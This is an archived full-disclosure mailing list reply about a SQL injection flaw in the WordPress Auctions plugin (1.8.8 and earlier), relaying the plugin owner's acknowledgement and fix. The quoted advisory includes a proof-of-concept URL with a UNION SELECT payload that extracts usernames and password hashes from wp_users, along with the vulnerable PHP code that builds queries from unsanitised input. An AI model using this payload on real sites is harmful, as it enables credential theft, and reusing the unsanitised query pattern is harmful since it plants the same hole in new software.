lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20110915134345.GA897@foo.fgeek.fi> Date: Thu, 15 Sep 2011 16:43:45 +0300 From: Henri Salo <henri@...v.fi> To: "Heyder[AlligatorTeam]" <heyder@...igatorteam.org> Cc: full-disclosure@...ts.grok.org.uk Subject: Re: WordPress Auctions plugin <= 1.8.8 SQL Injection On Wed, Sep 14, 2011 at 08:12:33PM +0300, Henri Salo wrote: > On Wed, Sep 14, 2011 at 12:04:03PM -0300, Heyder[AlligatorTeam] wrote: > > # Exploit Title: WordPress Auctions plugin <= 1.8.8 SQL Injection > > Vulnerability > > # Date: 2011-09-09 > > # Author: sherl0ck_ <sherl0ck_[at]alligatorteam[dot]org> > > @AlligatorTeam > > # Software Link: http://downloads.wordpress.org/plugin/wp-auctions.zip > > # Version: 1.8.8 (tested) > > > > --------------- > > PoC > > --------------- > > > > URL: > > http://localhost/wordpress/wp-admin/admin.php?page=wp-auctions-add&wpa_action=edit&wpa_id=-1+union+all+select+1,2,3,USER(),concat(user_login,char(58),user_pass),DATABASE(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+wp_users&_wpnonce=e04f105b8e > > > > --------------- > > Vulnerable code > > --------------- > > ... > > elseif($_GET["wpa_action"] == "edit"): > > $strSQL = "SELECT * FROM ".$table_name." WHERE id=".$_GET["wpa_id"]; > > ... > > elseif($_GET["wpa_action"] == "relist"): > > $strSQL = "SELECT * FROM ".$table_name." WHERE id=".$_GET["wpa_id"]; > > ... > > $resultList = $wpdb->get_row($strSQL); > > ... > > Did you report this issue to the author of the plugin? > > Best regards, > Henri Salo Module owner replied: "Thanks for raising this with us. The report is right in pointing out that those parameters aren't sanitised (which we will address immediately). It's work pointing out though, that this is an administration module (protected by WordPress's user permissions); rather than one that can be access anonymously." Follow-up: http://wordpress.org/support/topic/plugin-wp-auctions-wordpress-auctions-plugin?replies=3#post-2341622 Best regards, Henri Salo _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists